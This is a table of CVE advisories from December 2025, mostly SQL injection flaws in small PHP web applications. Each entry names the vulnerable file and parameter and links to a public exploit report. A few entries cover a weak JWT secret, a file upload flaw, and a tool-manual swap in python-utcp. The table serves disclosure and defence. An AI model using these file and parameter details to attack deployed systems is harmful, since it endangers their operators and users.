| tushar-2223--Hotel-Management-System | A vulnerability was identified in tushar-2223 Hotel-Management-System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. The impacted element is an unknown function of the file /admin/invoiceprint.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. | 2025-12-08 | 7.3 | CVE-2025-14207 | VDB-334650 | tushar-2223 Hotel-Management-System invoiceprint.php sql injection VDB-334650 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700478 | tushar-2223 Hotel-Management-System latest SQL Injection https://github.com/yaklang/IRifyScanResult/blob/main/Hotel-Management-System/SQL_Injection_Vulnerability_Report.md |
| Campcodes--School File Management System | A weakness has been identified in Campcodes School File Management System 1.0. This impacts an unknown function of the file /update_query.php. This manipulation of the argument stud_id causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-08 | 7.3 | CVE-2025-14209 | VDB-334652 | Campcodes School File Management System update_query.php sql injection VDB-334652 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700896 | Campcodes School File Management System 1.0 SQL Injection https://github.com/IdealDreamLast/PublicCVE/issues/1 https://www.campcodes.com/ |
| projectworlds--Advanced Library Management System | A security vulnerability has been detected in projectworlds Advanced Library Management System 1.0. Affected is an unknown function of the file /delete_member.php. Such manipulation of the argument user_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-08 | 7.3 | CVE-2025-14210 | VDB-334653 | projectworlds Advanced Library Management System delete_member.php sql injection VDB-334653 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700948 | projectworlds Advanced Library Management System 1.0 delete_member.php SQL injection https://github.com/rassec2/dbcve/issues/9 |
| projectworlds--Advanced Library Management System | A vulnerability was detected in projectworlds Advanced Library Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /delete_book.php. Performing manipulation of the argument book_id results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14211 | VDB-334654 | projectworlds Advanced Library Management System delete_book.php sql injection VDB-334654 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700949 | projectworlds Advanced Library Management System 1.0 delete_book.php SQL injection https://github.com/rassec2/dbcve/issues/10 |
| projectworlds--Advanced Library Management System | A flaw has been found in projectworlds Advanced Library Management System 1.0. Affected by this issue is some unknown functionality of the file /member_search.php. Executing manipulation of the argument roll_number can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2025-12-08 | 7.3 | CVE-2025-14212 | VDB-334655 | projectworlds Advanced Library Management System member_search.php sql injection VDB-334655 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700977 | projectworlds Advanced Library Management System 1.0 member_search.php SQL injection https://github.com/rassec2/dbcve/issues/11 |
| code-projects--Currency Exchange System | A vulnerability was found in code-projects Currency Exchange System 1.0. This vulnerability affects unknown code of the file /edit.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2025-12-08 | 7.3 | CVE-2025-14215 | VDB-334657 | code-projects Currency Exchange System edit.php sql injection VDB-334657 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701151 | Code-Projects Currency Exchange System 1.0 /edit.php SQL Injection https://github.com/rassec2/dbcve/issues/12 https://code-projects.org/ |
| code-projects--Currency Exchange System | A vulnerability was determined in code-projects Currency Exchange System 1.0. This issue affects some unknown processing of the file /viewserial.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-08 | 7.3 | CVE-2025-14216 | VDB-334658 | code-projects Currency Exchange System viewserial.php sql injection VDB-334658 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701152 | Code-Projects Currency Exchange System 1.0 /viewserial.php SQL Injection https://github.com/rassec2/dbcve/issues/13 https://code-projects.org/ |
| code-projects--Currency Exchange System | A vulnerability was identified in code-projects Currency Exchange System 1.0. Impacted is an unknown function of the file /edittrns.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2025-12-08 | 7.3 | CVE-2025-14217 | VDB-334659 | code-projects Currency Exchange System edittrns.php sql injection VDB-334659 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701154 | Code-Projects Currency Exchange System 1.0 /edittrns.php SQL Injection https://github.com/rassec2/dbcve/issues/14 https://code-projects.org/ |
| code-projects--Currency Exchange System | A security flaw has been discovered in code-projects Currency Exchange System 1.0. The affected element is an unknown function of the file /editotheraccount.php. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-08 | 7.3 | CVE-2025-14218 | VDB-334660 | code-projects Currency Exchange System editotheraccount.php sql injection VDB-334660 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701155 | Code-Projects Currency Exchange System 1.0 /editotheraccount.php SQL Injection https://github.com/rassec2/dbcve/issues/15 https://code-projects.org/ |
| code-projects--Simple Leave Manager | A vulnerability has been found in code-projects Simple Leave Manager 1.0. Affected by this vulnerability is an unknown functionality of the file /request.php. Such manipulation of the argument staff_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14223 | VDB-334665 | code-projects Simple Leave Manager request.php sql injection VDB-334665 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701639 | code-projects Simple Leave Manager In PHP With Source Code 1.0 SQL Injection https://github.com/woshilaiyi/cve/issues/4 https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was identified in itsourcecode Student Management System 1.0. This vulnerability affects unknown code of the file /edit_user.php. The manipulation of the argument fname leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Other parameters might be affected as well. | 2025-12-08 | 7.3 | CVE-2025-14226 | VDB-334668 | itsourcecode Student Management System edit_user.php sql injection VDB-334668 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701801 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/17 https://itsourcecode.com/ |
| n/a--IdeaCMS | A vulnerability has been found in IdeaCMS up to 1.8. This affects the function whereRaw of the file app/common/logic/index/Coupon.php. Such manipulation of the argument params leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14245 | VDB-334755 | IdeaCMS Coupon.php whereRaw sql injection VDB-334755 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702437 | Shop (GoodPu Mall) IdeaCMS 1.0 goods_ids parame SQL Injection https://github.com/rassec2/dbcve/issues/17 |
| code-projects--Simple Shopping Cart | A vulnerability was identified in code-projects Simple Shopping Cart 1.0. Impacted is an unknown function of the file /adminlogin.php. The manipulation of the argument admin_username leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-08 | 7.3 | CVE-2025-14248 | VDB-334758 | code-projects Simple Shopping Cart adminlogin.php sql injection VDB-334758 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702464 | code-projects Simple Shopping Cart V1.0 SQL injection https://github.com/zzb1388/cve/issues/92 https://code-projects.org/ |
| code-projects--Online Ordering System | A security flaw has been discovered in code-projects Online Ordering System 1.0. The affected element is an unknown function of the file /user_school.php. The manipulation of the argument product_id results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-08 | 7.3 | CVE-2025-14249 | VDB-334759 | code-projects Online Ordering System user_school.php sql injection VDB-334759 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702465 | code-projects Online Ordering System V1.0 SQL injection https://github.com/zzb1388/cve/issues/93 https://code-projects.org/ |
| code-projects--Online Ordering System | A weakness has been identified in code-projects Online Ordering System 1.0. The impacted element is an unknown function of the file /user_contact.php. This manipulation of the argument Name causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-08 | 7.3 | CVE-2025-14250 | VDB-334760 | code-projects Online Ordering System user_contact.php sql injection VDB-334760 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702466 | code-projects Online Ordering System V1.0 SQL injection https://github.com/zzb1388/cve/issues/94 https://code-projects.org/ |
| code-projects--Online Ordering System | A security vulnerability has been detected in code-projects Online Ordering System 1.0. This affects an unknown function of the file /admin/ of the component Admin Login. Such manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-08 | 7.3 | CVE-2025-14251 | VDB-334761 | code-projects Online Ordering System Admin Login admin sql injection VDB-334761 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702467 | code-projects Online Ordering System V1.0 SQL injection https://github.com/zzb1388/cve/issues/95 https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was detected in itsourcecode Student Management System 1.0. This impacts an unknown function of the file /newcurriculm.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14256 | VDB-334762 | itsourcecode Student Management System newcurriculm.php sql injection VDB-334762 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702484 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/J0kkeR/cve/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A flaw has been found in itsourcecode Student Management System 1.0. Affected is an unknown function of the file /newrecord.php. Executing manipulation of the argument ID can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-08 | 7.3 | CVE-2025-14257 | VDB-334763 | itsourcecode Student Management System newrecord.php sql injection VDB-334763 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702487 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/J0kkeR/cve/issues/2 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability has been found in itsourcecode Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /newsubject.php. The manipulation of the argument sub leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14258 | VDB-334764 | itsourcecode Student Management System newsubject.php sql injection VDB-334764 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702619 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/18 https://itsourcecode.com/ |
| Litmuschaos--litmus | The Litmus platform uses JWT for authentication and authorization, but the secret being used for signing the JWT is only 6 bytes long at its core, which makes it extremely easy to crack. | 2025-12-08 | 7.1 | CVE-2025-14261 | https://research.jfrog.com/vulnerabilities/litmus-jwt-missing-entropy-elevation-jfsa-2025-001648159/ https://github.com/litmuschaos/litmus/pull/5324 |
| code-projects--Employee Profile Management System | A vulnerability was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_personnel.php. The manipulation of the argument per_id results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-12-09 | 7.3 | CVE-2025-14285 | VDB-334873 | code-projects Employee Profile Management System edit_personnel.php sql injection VDB-334873 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702684 | code-projects Employee Profile Management System V1 SQL injection https://github.com/tiancesec/CVE/issues/15 https://code-projects.org/ |
| ravynsoft--ravynos | NULL Pointer Dereference vulnerability in ravynsoft ravynos. This issue affects ravynos: through 0.5.2. | 2025-12-09 | 7.5 | CVE-2025-14309 | https://github.com/ravynsoft/ravynos/pull/502 |
| itsourcecode--Student Management System | A flaw has been found in itsourcecode Student Management System 1.0. Affected is an unknown function of the file /new_adviser.php. Executing manipulation of the argument Name can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. | 2025-12-09 | 7.3 | CVE-2025-14334 | VDB-335159 | itsourcecode Student Management System new_adviser.php sql injection VDB-335159 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702741 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/19 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability has been found in itsourcecode Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /new_school_year.php. The manipulation of the argument sy leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-09 | 7.3 | CVE-2025-14335 | VDB-335160 | itsourcecode Student Management System new_school_year.php sql injection VDB-335160 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702743 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/20 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was found in itsourcecode Student Management System 1.0. Affected by this issue is some unknown functionality of the file /promote.php. The manipulation of the argument sy results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2025-12-09 | 7.3 | CVE-2025-14336 | VDB-335161 | itsourcecode Student Management System promote.php sql injection VDB-335161 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702744 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/21 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was determined in itsourcecode Student Management System 1.0. This affects an unknown part of the file /new_grade.php. This manipulation of the argument grade causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-09 | 7.3 | CVE-2025-14337 | VDB-335162 | itsourcecode Student Management System new_grade.php sql injection VDB-335162 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702745 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/22 https://itsourcecode.com/ |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. Affected is an unknown function of the file /admin/add_distributor.php. This manipulation of the argument txtDistributorAddress causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-12-11 | 7.3 | CVE-2025-14514 | VDB-335852 | Campcodes Supplier Management System add_distributor.php sql injection VDB-335852 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702752 | Campcodes Supplier Management System V1.0 SQL Injection Submit #702760 | Campcodes Supplier Management System V1.0 SQL Injection (Duplicate) https://github.com/ProgramShowMaker/CVE/issues/4 https://github.com/ProgramShowMaker/CVE/issues/5 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add_unit.php. Such manipulation of the argument txtunitDetails leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-11 | 7.3 | CVE-2025-14515 | VDB-335853 | Campcodes Supplier Management System add_unit.php sql injection VDB-335853 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #704108 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/falling-snow1/vuldb/issues/3 https://www.campcodes.com/ |
| projectworlds--Advanced Library Management System | A weakness has been identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /view_book.php. Executing manipulation of the argument book_id can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-12-11 | 7.3 | CVE-2025-14527 | VDB-335867 | projectworlds Advanced Library Management System view_book.php sql injection VDB-335867 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703096 | Projectworlds Library Management System V1.0 SQL Injection https://github.com/Sunhaobin318/CVE/issues/8 |
| Campcodes--Retro Basketball Shoes Online Store | A flaw has been found in Campcodes Retro Basketball Shoes Online Store 1.0. The affected element is an unknown function of the file /admin/admin_running.php. This manipulation of the argument pid causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-12-11 | 7.3 | CVE-2025-14529 | VDB-335870 | Campcodes Retro Basketball Shoes Online Store admin_running.php sql injection VDB-335870 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703191 | Campcodes Retro Basketball Shoes Online Store V1.0 SQL Injection https://github.com/Rowantu/CVE/issues/7 https://www.campcodes.com/ |
| code-projects--Class and Exam Timetable Management | A security flaw has been discovered in code-projects Class and Exam Timetable Management 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login. The manipulation of the argument username/password results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-11 | 7.3 | CVE-2025-14536 | VDB-335875 | code-projects Class and Exam Timetable Management Login index.php sql injection VDB-335875 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703700 | code projects Class and Exam Timetable Management System 1.0 SQL injection Submit #703701 | code projects Class and Exam Timetable Management System 1.0 SQL injection (Duplicate) https://github.com/woshilaiyi/cve/issues/11 https://github.com/woshilaiyi/cve/issues/12 https://code-projects.org/ |
| code-projects--Class and Exam Timetable Management | A weakness has been identified in code-projects Class and Exam Timetable Management 1.0. Affected by this issue is some unknown functionality of the file /preview7.php. This manipulation of the argument course_year_section/semester causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. | 2025-12-11 | 7.3 | CVE-2025-14537 | VDB-335876 | code-projects Class and Exam Timetable Management preview7.php sql injection VDB-335876 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703712 | code projects Class and Exam Timetable Management System 1.0 SQL injection Submit #703717 | code projects Class and Exam Timetable Management System 1.0 SQL injection (Duplicate) https://github.com/woshilaiyi/cve/issues/13 https://github.com/woshilaiyi/cve/issues/14 https://code-projects.org/ |
| n/a-- python-utcp | The vulnerability arises when a client fetches a tools' JSON specification, known as a Manual, from a remote Manual Endpoint. While a provider may initially serve a benign manual (e.g., one defining an HTTP tool call), earning the clients' trust, a malicious provider can later change the manual to exploit the client. | 2025-12-13 | 7.5 | CVE-2025-14542 | https://research.jfrog.com/vulnerabilities/python-utcp-untrusted-manual-command-execution-jfsa-2025-001648329/ https://github.com/universal-tool-calling-protocol/python-utcp/commit/2dc9c02df72cad3770c934959325ec344b441444 |
| kidaze--CourseSelectionSystem | A vulnerability was identified in kidaze CourseSelectionSystem up to 42cd892b40a18d50bd4ed1905fa89f939173a464. The affected element is an unknown function of the file /Profilers/SProfile/login1.php. Such manipulation of the argument Username leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2025-12-12 | 7.3 | CVE-2025-14565 | VDB-336189 | kidaze CourseSelectionSystem login1.php sql injection VDB-336189 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703875 | github.com Course Selection System v1.0 SQL injection https://github.com/Anti1i/cve/issues/1 |
| kidaze--CourseSelectionSystem | A security flaw has been discovered in kidaze CourseSelectionSystem up to 42cd892b40a18d50bd4ed1905fa89f939173a464. The impacted element is an unknown function of the file /Profilers/SProfile/reg.php. Performing manipulation of the argument USN results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-12 | 7.3 | CVE-2025-14566 | VDB-336190 | kidaze CourseSelectionSystem reg.php sql injection VDB-336190 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703876 | github.com Course Selection System v1.0 SQL injection Submit #704951 | github.com Course Selection System Project V1.0 SQL Injection (Duplicate) https://github.com/Anti1i/cve/issues/2 |
| projectworlds--Advanced Library Management System | A flaw has been found in projectworlds Advanced Library Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view_admin.php. This manipulation of the argument admin_id causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-12-12 | 7.3 | CVE-2025-14570 | VDB-336194 | projectworlds Advanced Library Management System view_admin.php sql injection VDB-336194 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #704087 | projectworlds Library Management System V1.0 SQL Injection https://github.com/louxiadelaolitou/CVE/issues/1 |
| projectworlds--Advanced Library Management System | A vulnerability has been found in projectworlds Advanced Library Management System 1.0. Affected by this issue is some unknown functionality of the file /borrow_book.php. Such manipulation of the argument roll_number leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-12 | 7.3 | CVE-2025-14571 | VDB-336195 | projectworlds Advanced Library Management System borrow_book.php sql injection VDB-336195 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #704088 | Projectworlds Library Management System V1.0 SQL Injection https://github.com/louxiadelaolitou/CVE/issues/2 |
| itsourcecode--Student Management System | A weakness has been identified in itsourcecode Student Management System 1.0. The affected element is an unknown function of the file /update_account.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-12 | 7.3 | CVE-2025-14578 | VDB-336200 | itsourcecode Student Management System update_account.php sql injection VDB-336200 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #704794 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/23 https://itsourcecode.com/ |
| campcodes--Online Student Enrollment System | A flaw has been found in campcodes Online Student Enrollment System 1.0. This impacts an unknown function of the file /admin/register.php. Executing manipulation of the argument photo can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-12 | 7.3 | CVE-2025-14583 | VDB-336203 | campcodes Online Student Enrollment System register.php unrestricted upload VDB-336203 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705525 | campcodes Online Student Enrollment System V1.0 Unrestricted Upload https://github.com/CHENCHOUCHOU/vuln/issues/1 https://www.campcodes.com/ |
| itsourcecode--COVID Tracking System | A vulnerability has been found in itsourcecode COVID Tracking System 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-12 | 7.3 | CVE-2025-14584 | VDB-336204 | itsourcecode COVID Tracking System Admin Login login.php sql injection VDB-336204 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705534 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/Wegetmore/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--COVID Tracking System | A vulnerability was found in itsourcecode COVID Tracking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/?page=zone. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-12-12 | 7.3 | CVE-2025-14585 | VDB-336205 | itsourcecode COVID Tracking System page sql injection VDB-336205 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705535 | itsourcecode COVID Tracking System V1.0 SQL Injection Submit #706053 | itsourcecode COVID Tracking System V1.0 L Injection (Duplicate) https://github.com/Ggeee3/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Online Pet Shop Management System | A vulnerability was identified in itsourcecode Online Pet Shop Management System 1.0. This affects an unknown part of the file /pet1/available.php. Such manipulation of the argument Name leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-12-13 | 7.3 | CVE-2025-14587 | VDB-336207 | itsourcecode Online Pet Shop Management System available.php sql injection VDB-336207 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705670 | itsourcecode Online Pet Shop Management System V1.0 SQL Injection https://github.com/tzm113/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security flaw has been discovered in itsourcecode Student Management System 1.0. This vulnerability affects unknown code of the file /update_program.php. Performing manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-12-13 | 7.3 | CVE-2025-14588 | VDB-336208 | itsourcecode Student Management System update_program.php sql injection VDB-336208 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707081 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/24 https://itsourcecode.com/ |
| code-projects--Prison Management System | A security vulnerability has been detected in code-projects Prison Management System 2.0. Impacted is an unknown function of the file /admin/search1.php. The manipulation of the argument keyname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-13 | 7.3 | CVE-2025-14590 | VDB-336210 | code-projects Prison Management System search1.php sql injection VDB-336210 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707096 | code-projects Prison Management System 2.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL19.md https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was found in code-projects Student File Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login_query.php. Performing manipulation of the argument stud_no results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-12-13 | 7.3 | CVE-2025-14619 | VDB-336304 | code-projects Student File Management System login_query.php sql injection VDB-336304 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707101 | Code-projects Student File Management System 1.0 SQL Injection Submit #709095 | Code-projects Student File Management System v1.0 Authentication Bypass by Primary Weakness (Duplicate) https://github.com/jjjjj-zr/jjjjjzr2/issues/2 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was determined in code-projects Student File Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/login_query.php. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-13 | 7.3 | CVE-2025-14620 | VDB-336305 | code-projects Student File Management System login_query.php sql injection VDB-336305 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707109 | Code-projects Student File Management System 1.0 SQL Injection Submit #709074 | Code-projects Student File Management System v1.0 Authentication Bypass by Primary Weakness (Duplicate) https://github.com/jjjjj-zr/jjjjjzr3/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was identified in code-projects Student File Management System 1.0. This affects an unknown part of the file /admin/update_user.php. The manipulation of the argument user_id leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-13 | 7.3 | CVE-2025-14621 | VDB-336306 | code-projects Student File Management System update_user.php sql injection VDB-336306 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707132 | Code-projects Student File Management System 1.0 SQL injection https://github.com/jjjjj-zr/jjjjjzr4/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A security flaw has been discovered in code-projects Student File Management System 1.0. This vulnerability affects unknown code of the file /admin/save_user.php. The manipulation of the argument firstname results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-13 | 7.3 | CVE-2025-14622 | VDB-336307 | code-projects Student File Management System save_user.php sql injection VDB-336307 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707135 | Code-projects Student File Management System 1.0 SQL injection Submit #709197 | Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr5/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A weakness has been identified in code-projects Student File Management System 1.0. This issue affects some unknown processing of the file /admin/update_student.php. This manipulation of the argument stud_id causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-12-13 | 7.3 | CVE-2025-14623 | VDB-336308 | code-projects Student File Management System update_student.php sql injection VDB-336308 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707157 | Code-projects Student File Management System 1.0 SQL injection Submit #709202 | Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr6/issues/1 https://code-projects.org/ |
| itsourcecode--Online Pet Shop Management System | A weakness has been identified in itsourcecode Online Pet Shop Management System 1.0. This vulnerability affects unknown code of the file /pet1/addcnp.php. This manipulation of the argument cnpname causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-13 | 7.3 | CVE-2025-14637 | VDB-336362 | itsourcecode Online Pet Shop Management System addcnp.php sql injection VDB-336362 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707271 | itsourcecode Online Pet Shop Management System V1.0 SQL Injection https://github.com/sec-dreamer/vulpxnPolm/issues/1 https://itsourcecode.com/ |
| itsourcecode--Online Pet Shop Management System | A security vulnerability has been detected in itsourcecode Online Pet Shop Management System 1.0. This issue affects some unknown processing of the file /pet1/update_cnp.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-14 | 7.3 | CVE-2025-14638 | VDB-336363 | itsourcecode Online Pet Shop Management System update_cnp.php sql injection VDB-336363 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #709625 | itsourcecode Online Pet Shop Management System V1.0 SQL Injection https://github.com/qingdus/temp_cve/issues/2 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was detected in itsourcecode Student Management System 1.0. Impacted is an unknown function of the file /uprec.php. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14639 | VDB-336364 | itsourcecode Student Management System uprec.php sql injection VDB-336364 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710017 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/25 https://itsourcecode.com/ |
| code-projects--Student File Management System | A flaw has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /admin/save_student.php. Executing manipulation of the argument stud_no can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2025-12-14 | 7.3 | CVE-2025-14640 | VDB-336365 | code-projects Student File Management System save_student.php sql injection VDB-336365 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710162 | Code-projects Student File Management System v1.0 SQL Injection Submit #709201 | Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr14/issues/1 https://code-projects.org/ |
